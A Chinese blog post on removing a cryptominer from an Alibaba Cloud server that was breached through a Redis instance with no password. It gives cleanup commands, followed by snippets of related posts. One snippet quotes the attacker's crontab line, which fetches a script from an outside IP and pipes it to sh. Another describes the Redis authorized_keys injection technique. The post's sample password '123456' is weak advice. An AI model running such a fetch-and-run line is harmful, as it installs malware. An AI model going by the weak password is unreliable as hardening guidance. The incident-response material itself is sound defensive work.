阿里云服务器被挖矿攻击,redis无密码访问进入

最新推荐文章于 2024-04-11 06:01:05 发布
最新推荐文章于 2024-04-11 06:01:05 发布
阅读量686 收藏
点赞数
分类专栏: 云数据存储 文章标签: 阿里云 挖矿 redis 服务器攻击 云服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_39533410/article/details/110917232
版权
博客介绍了应对阿里云Redis服务器挖矿攻击的处理方法。包括查找并删除挖矿进程、查询文件位置、进入文件目录按时间查找文件、删除植入文件,若无法删除需特殊操作,还需修改Redis配置文件、重启Redis,最后注释0.0.0.0、修改登录密码并删除可疑脚本任务文件。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.查找进程 top,并删除挖矿进程

top

kill -9 Pid

2. 查询文件所在位置 

find / -name 'processname'

3.进入到文件目录 按时间顺序查找文件

ls -lt //按时间排序

4.删除植入文件

 rm -rf newbat.sh
//报错 rm: cannot remove ‘newdat.sh’: Operation not permitted

5.即使你是root权限,但是你仍然也无法删除,需要进行操作

lsattr newdat.sh

chattr -i newdat.sh

rm -rf newdat.sh //经过上两步操作即可删除root无法删除的文件。

6.修改redis配置文件

vi redis.conf 

//查找requirepass,修改requirepass后内容,保存

requirepass 123456

ps -ef|grep redis

kill -9 pid #redis进程

 

7.重新启动redis

 

8.(重点在以上7点) 将0.0.0.0注释掉,修改阿里云登录密码,重新删除上面找到的可疑脚本任务文件。

完。

linux服务器上搭建单机的redis 跟搭建不带密码redis集群 以及带密码的redis集群
qq_42599451的博客
07-18 2300
Redis是c语言开发的。 安装redis需要c语言的编译环境。如果没有gcc需要在线安装。yum install gcc-c++ 这时我们需要拿到root用户权限才能执行yum命令   安装步骤: 第一步:redis的源码包上传到linux系统。 第二步:解压缩redis  执行tar xzf redis-4.0.10.tar.gz。 第三步:编译。进入redis源码目录。make  ...
阿里云服务器养只大虫子:Redis漏洞挖矿造成CPU100%的解决办法
Sail__的专栏
01-17 3998
之前在9月份的时候,我的阿里云服务器出现过一次被挖矿的情况,也是cpu爆满,后来发现是因为mysql的漏洞。 当时抓着mysql一顿处理,新建用户,强密码,设权限,nologin,可算是正常了。 这几天又再次出现了被挖矿的情况,今天算是解决了,舒服,下面说下情况。 表现:服务器上的web应用一场的慢,ssh登陆进去top -c查看如下: COMMAN处的[UWcUml]占用cpu100...
阿里云服务器被入侵——redis挖矿
weixin_33947521的博客
05-02 228
1、起因: 发现运维平台上没有昨天计划任务相关的数据,登上服务器,才发现crontab被改了 [root@58 ~]# crontab -l */5 * * * * curl -fsSL http://218.248.40.228:9999/i.sh?6 | sh``` 2、处理过程: ①、停掉计划任务: [root@58 ~]# cronta...
阿里云服务器被[crypto]攻击导致CPU爆满(已解决)
大鹏
07-14 1840
缘由 之前玩Docker并开放了2375端口和redis 弱密码 且默认6379端口 的时候,安装时未使用密码,然后还在阿里云开放了0.0.0.0的6379端口,导致出现了漏洞, 现象 被安装了Docker镜像且启用了容器运行。 Reids多了几条任务计划的缓存数据 /usr/share 目录下多了 5个文件 -rwxr-xr-x 1 root root 4563624 Jul 1 17:46 '[crypto]' -rw-r--r-- 1 root root 4384...
redis无密码登录
embelfe_segge的博客
03-23 1911
redis配置文件redis.conf中,Redis3.2加入的新特性,开启保护模式。即开启了protected-mode,默认值为 protected-mode =yes 是说redis只允许本机登录。 这样登录的前提是要设置密码,即要requirepass属性, requirepass =你设置的密码 如要无密码登录,就要设置protected-mode =no ,即可 ...
阿里云服务器Redis弱密码漏洞挖矿
清风思雨的博客
08-11 481
重启了三次,没办法,最后是通过重装了系统才解决的,就短短的半个小时,就被渗透,这速度。总之损失了很多文件,配置,数据库也没有被及时备份,唉,之前被SSH远程攻击上万次都没被打,被redis的漏洞半个小时沦陷,长个记性,以后注意!我尝试了网上的极多的解决方案,但是都没用了,这些黑客的手段也是不断更新迭代。定时任务我也改了,删了,再到病毒文件清空了,但是都无所事事,进程杀不死,CPU长时间100%。...
阿里云服务器被pnscan挖矿病毒入侵如何解决?
m0_64344919的博客
01-26 1395
针对将SpringBoot项目打包docker镜像部署到服务器上出现的后续问题,有关2375端口开放的问题
服务器被黑客用来挖矿?怎么办?
JAVA88866的博客
05-14 2612
哈喽,大家好,我是老表~ 昨天下午一个朋友和我说,他的服务器阿里云监测出来在挖矿,然后阿里云官方把服务器给关停了。 不用急,这个时候最简单的方法是在阿里云里提一个工单,反馈相关问题。 解禁服务器 要解决问题、排查删除挖矿程序,首先我们需要解禁服务器,登录阿里云官方平台后,依次点击控制台->个人头像->安全管控进入相关页面。 在处罚列表,我们可以看到相关处罚记录,点击解除封禁后即可正常进入服务器了。 会有提示,需要在解禁后三日内找到挖矿程序,并删除,否则官...
阿里云服务器遭受挖矿程序的入侵的清理之战
qq_38685242的博客
07-26 2784
最近在阿里云服务器上安装了缓存redis,由于没有设置密码,并且开放了6379端口,遭受了挖矿程序攻击。操作系统为centos7。
记录一下五天前的晚上阿里云服务器redis被入侵的经历
weixin_43938739的博客
05-17 910
我是个普通大二学生,最近做项目需要部署到服务器上,于是我月初在阿里云买了个小服务器,安装好jdk,tomcat,mysql,redis就没管了,第一次弄服务器,没什么经验,当时漏洞我没管,打算有空再搞.redis密码也没设置(太蠢了),端口还是默认的6379对外网开放. 就这么相安无事过了7天吧,那天晚上还在打游戏,看到阿里云发来的短信心头一紧,马上上去看,被入侵了,查了一会,发现是挖矿木马,就是如下这种 https://zhuanlan.zhihu.com/p/54610161 我上来就登录redis f
redis受到攻击
weixin_40083227的博客
05-03 511
今天被挖矿软件不小心植入脚本了,导致云服务器100%的CPU占用,被迫当肉鸡。原因是redis的默认端口没有改,也没有密码,就被攻击。 解决方法是 sudo kill -9 10053 && sudo userdel redis 必须要同时执行,这个脚本会自动唤醒,删除redis用户后,找到异常的脚本文件删除掉。然后卸载redis,sudo apt remove redis ...
H2Miner变种,利用Redis漏洞入侵云服务器wa矿
热门推荐
China Honker 博客
01-12 114万+
H2Miner变种木马入侵后会下载挖矿木马,通过安装定时任务持久化,通过SSH复用连接进行横向移动感染。该程序由GO语言开发,通过还原后的函数名进行对比,可知其是H2Miner此前的kinsing文件变种,并且与http[:]//45.10.88.124/kinsing下载得到的文件一致。Redis 4.x/5.x 版本存在主从同步命令执行漏洞(CNVD-2019-21763),攻击者通过构造特定的请求实现漏洞利用,成功利用漏洞可在目标服务器上实现Getshell,该漏洞风险较高,且漏洞利用方式已被公开。
阿里云服务器提示被用来挖矿
m0_53434091的博客
02-10 614
近期想再使用服务器了,但是想到之前服务器挖矿,所以就决定重置磁盘,然后发现确实不被挖矿了,然后第二天就开始给服务器安装软件...JDK、MySQL、Redis、Tomcat....等等一些软件。之前被在阿里购买了一个服务器,后来一直没用,就有短信提示被挖矿,也没有在意,随手就给关闭服务器了(因为没有买阿里云提供的防护,所以不知道是哪里出了问题)别人就可以通过Redis向系统注入本地公钥到服务器的/root/.ssh/authorized_keys中,然后就可以在本地免密登录你的服务器了。
阿里云发生故障,网友炸了,官方回应道歉。对此事你怎么看?
zhaojifang的博客
06-29 3665
阿里云工程师又“惹祸” 鸡蛋放在一个篮子里是对是错?昨天,阿里云的工程师又“惹祸”了。27日下午 16:30 左右,微信朋友圈、微信群、微博陆续出现阿里云故障的消息,网友表示,访问阿里云官方显示502错误,即使偶尔打开页面,控制台也无法正常登陆。随后阿里云发布异常公告:今日凌晨,阿里云官方微博发布公告,表示:“对于这次故障,没有借口,我们不能也不该出现这样的失误!我们将认真复盘改进自动化运维技术和...
记一次有惊无险的阿里云服务器线上事故
java小白
03-17 410
那天天气很好,客户打来电话说准备进行一次考试(我们的在线考试平台),但是进不去了是什么问题???? 我:?????? 我:您稍等 我看看 我首先是不信邪的,试着访问了下,果然进不去。F12看控制台发现都是404。 我:???404是什么鬼?难道是有人动了服务器!! ...
公司使用的阿里云服务器宕机了,瞬间系统瘫痪
wanglei的博客
11-23 2085
文章目录起因解决方法思考 起因 服务器没有使用集群,纯粹的单台。 待调查 解决方法 重启 服务器 思考 宕机原因(top, 内存消耗满) 宕机之后是否有备用方案来解决宕机到恢复之间的空白时间。 所有的服务部署再一台服务器,导致全部的服务受影响。(使用的非微服务方式) ...
临时工说:腾讯云,阿里云故障 “核爆炸” 后持续的影响
sql server的专栏
04-11 566
开头还是介绍一下群,如果感兴趣PolarDB ,MongoDB ,MySQL ,PostgreSQL ,Redis, Oceanbase, Sql Server等有问题,有需求都可以加群群内有各大数据库行业大咖,CTO,可以解决你的问题。加群请联系 liuaustin3 ,(共2150人左右 1 + 2 + 3 + 4 +5) 新人奖直接分配到5群,另欢迎 OpenGauss 的技术人员加入。腾讯...
Linux 删除文件提示:rm: cannot remove ‘XXXX‘: Operation not permitted 解决方案
这货有些呆
05-02 4119
linux服务器上经常出现不能删除的文件,是什么原因导致的了?又该如何删除?
chattr命令,设置linux文件的隐藏权限
weixin_34380781的博客
04-08 294
很不幸,我公司的服务器被***光顾了,安插了一个名字叫8899的恶意程序文件在tomcat下面的bin目录,还好我火眼金睛,用top看出了端倪,竟然发现ps命令也被他替换了,真是有点麻烦了,不过没关系,去虚拟机拷一个替换就好.然而重点是,这个8899的文件居然是删不掉的,报错Operation not permitte,然后网上查资料,原来是chattr命令搞的鬼.chatt...
idea中 @Autowired private IStudentsService studentsService; 此处画红色波浪线报错studentsService;
最新发布
04-03
### 解决 IntelliJ IDEA 中 `@Autowired` 注解导致的红色波浪线错误 在使用 Spring 框架时,如果遇到 `@Autowired` 注解下的依赖注入对象显示为红色波浪线错误或者黄色警告的情况,通常是由以下几个原因引起的: #### 1. **Spring 插件未启用** 如果 Spring 支持插件未被激活,则可能导致 IDE 无法识别 `@Autowired` 或其他 Spring 特定的功能。可以通过以下方式解决问题: - 打开设置菜单:`File -> Settings -> Plugins`。 - 确认已安装并启用了名为 “Spring Framework Support” 的官方插件[^1]。 #### 2. **项目配置文件缺失或不正确** Spring 需要通过 XML 文件、Java Config 类或其他形式来定义 Bean 定义。如果没有正确加载这些配置文件,可能会导致 `@Autowired` 报错。 - 确保项目的 `applicationContext.xml` 或者基于 Java 的配置类(带有 `@Configuration` 和 `@Bean` 注解)已被正确定义和引入。 - 对于 Spring Boot 项目,确认是否存在 `spring.factories` 文件以及是否包含了必要的组件扫描路径[^3]。 #### 3. **模块依赖关系问题** 当前模块可能缺少对 Spring Core 或 Context 组件库的有效引用。这可能是由于 Maven/Gradle 构建工具中的依赖项声明不足造成的。 - 检查 `pom.xml` (Maven) 或 `build.gradle` (Gradle),确保包含如下核心依赖之一: ```xml <!-- For Maven --> <dependency> <groupId>org.springframework</groupId> <artifactId>spring-context</artifactId> <version>${spring.version}</version> </dependency> ``` ```gradle // For Gradle implementation 'org.springframework:spring-context:${springVersion}' ``` - 更新项目依赖树以应用更改:右键点击项目根目录 -> `Maven -> Reload Project` 或运行命令 `./gradlew build --refresh-dependencies`。 #### 4. **IDE 缓存损坏** Intellij IDEA 的缓存机制有时会因各种因素而失效,从而引发误报错误。清除缓存可以有效缓解此类情况。 - 使用快捷组合键 `Ctrl + Alt + Shift + S` 进入项目结构对话框;也可以尝试执行操作序列:`File -> Invalidate Caches / Restart... -> Invalidate and Restart`. #### 5. **启动异常影响正常解析** 若之前存在类似 `com.intellij.diagnostic.PluginException` 的严重初始化失败日志记录,则表明某些关键服务未能成功加载,进而干扰到后续功能表现[^2]。建议重新下载最新稳定版本的 IDEA 并按照标准流程完成初次部署工作。 ```java // 示例代码片段展示如何正确运用 @Autowired 注解实现自动装配 @Service public class StudentService { private final Repository repository; public StudentService(@Qualifier("specificRepository") Repository repo){ this.repository = repo; } } @Component class SpecificComponent{ @Autowired private transient StudentService studentService; // 此处应无任何编译期告警现象发生 } ```
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值